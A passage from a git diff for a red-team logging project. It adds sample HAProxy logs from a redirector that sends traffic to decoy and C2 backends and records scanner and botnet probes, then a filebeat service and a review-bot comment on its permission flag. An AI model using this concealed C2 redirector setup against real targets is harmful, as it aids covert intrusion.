10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7|167.71.58.116:80|||||} statuscode:503 request:GET / HTTP/1.1 +Apr 3 12:01:03 redelkdemo-redirb1 haproxy[7059]: GMT:03/Apr/2020:10:01:00 +0000 frontend:www-http/redelkdemo-redirb1/167.71.58.116:80 backend:decoy-www client:162.243.129.30:36344 xforwardedfor:- headers:{|Mozilla/5.0 zgrab/0.x|167.71.58.116|||||} statuscode:503 request:GET /hudson HTTP/1.1 +Apr 3 12:55:35 redelkdemo-redirb1 haproxy[7059]: GMT:03/Apr/2020:10:55:32 
+0000 frontend:www-http/redelkdemo-redirb1/167.71.58.116:80 backend:decoy-www client:200.5.113.138:51881 xforwardedfor:- headers:{|polaris botnet||||||} statuscode:503 request:POST /boaform/admin/formPing HTTP/1.1 +Apr 3 13:14:12 redelkdemo-redirb1 haproxy[7059]: GMT:03/Apr/2020:11:14:09 +0000 frontend:www-http/redelkdemo-redirb1/167.71.58.116:80 backend:decoy-www client:46.100.228.8:49376 xforwardedfor:- headers:{|Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36|167.71.58.116:80|||||} statuscode:503 request:GET / HTTP/1.1 +Apr 3 14:49:35 redelkdemo-redirb1 haproxy[7059]: GMT:03/Apr/2020:12:49:32 +0000 frontend:www-http/redelkdemo-redirb1/167.71.58.116:80 backend:decoy-www client:171.67.70.85:48350 xforwardedfor:- headers:{|Mozilla/5.0 zgrab/0.x|167.71.58.116|||||} statuscode:503 request:GET / HTTP/1.1 +Apr 3 16:19:23 redelkdemo-redirb1 haproxy[7059]: GMT:03/Apr/2020:14:19:23 +0000 frontend:www-http/redelkdemo-redirb1/167.71.58.116:80 backend:www-http client:176.58.249.102:52279 xforwardedfor:- headers:{|||||||} statuscode:400 request: +Apr 3 16:58:18 redelkdemo-redirb1 haproxy[7059]: GMT:03/Apr/2020:14:58:15 +0000 frontend:www-http/redelkdemo-redirb1/167.71.58.116:80 backend:decoy-www client:80.232.185.213:40262 xforwardedfor:- headers:{|Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36|167.71.58.116:80|||||} statuscode:503 request:GET / HTTP/1.1 +Apr 3 16:58:18 redelkdemo-redirb1 haproxy[7059]: GMT:03/Apr/2020:14:58:15 +0000 frontend:www-http/redelkdemo-redirb1/167.71.58.116:80 backend:c2-http client:80.232.185.213:40262 xforwardedfor:- headers:{|Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36|167.71.58.116:80|||||} statuscode:503 request:GET / HTTP/1.1 +Apr 3 16:58:18 redelkdemo-redirb1 haproxy[7059]: GMT:04/Apr/2020:14:58:15 +0000 
frontend:www-http/redelkdemo-redirb1/167.71.58.116:80 backend:c2-http client:80.232.185.213:40262 xforwardedfor:- headers:{|Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36|167.71.58.116:80|||||} statuscode:503 request:GET / HTTP/1.1 diff --git a/elkserver/mounts/sample-data/logs/nginx.log b/elkserver/mounts/sample-data/logs/nginx.log new file mode 100644 index 00000000..e69de29b diff --git a/elkserver/redelk-dev.yml b/elkserver/redelk-dev.yml index e196b595..8a9297dd 100644 --- a/elkserver/redelk-dev.yml +++ b/elkserver/redelk-dev.yml @@ -214,3 +214,16 @@ services: restart: always depends_on: - jupyter + + filebeat: + container_name: redelk-sample-data + image: docker.elastic.co/beats/filebeat:7.9.2 + networks: + - net + volumes: + - ./mounts/sample-data/filebeat.yml:/usr/share/filebeat/filebeat.yml:ro + - ./mounts/sample-data/logs:/var/log/sample-data:ro + - ./mounts/logstash-config/certs_inputs/redelkCA.crt:/usr/share/filebeat/redelkCA.crt:ro + command: ['filebeat', '-e', '-strict.perms=false'] + depends_on: + - logstash
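Review bot: `command: ['filebeat', '-e', '-strict.perms=false']` in the new `filebeat` service turns off Beats' config-file ownership/permission check without saying why; it is presumably required here because `filebeat.yml` is a host bind mount whose owner cannot match the container's user, but with no comment the flag reads as a shortcut that weakens the config integrity check and is likely to be copied into non-sample services. Keep the rationale next to the flag, e.g. `# -strict.perms=false: filebeat.yml is a read-only host bind mount, so its owner/mode cannot satisfy the Beats config permission check`; the `:ro` on that mount is what actually limits the exposure and is worth naming in the same comment. This service is also the only one in the visible hunk without a `restart:` policy, while the sibling context above it has `restart: always`; if the sample-data loader is intended to be one-shot, an explicit `restart: "no"` with a one-line comment would make that deliberate rather than an omission. The service key `filebeat` differs from `container_name: redelk-sample-data`, which is fine but deserves a comment so someone grepping for the container name finds the service.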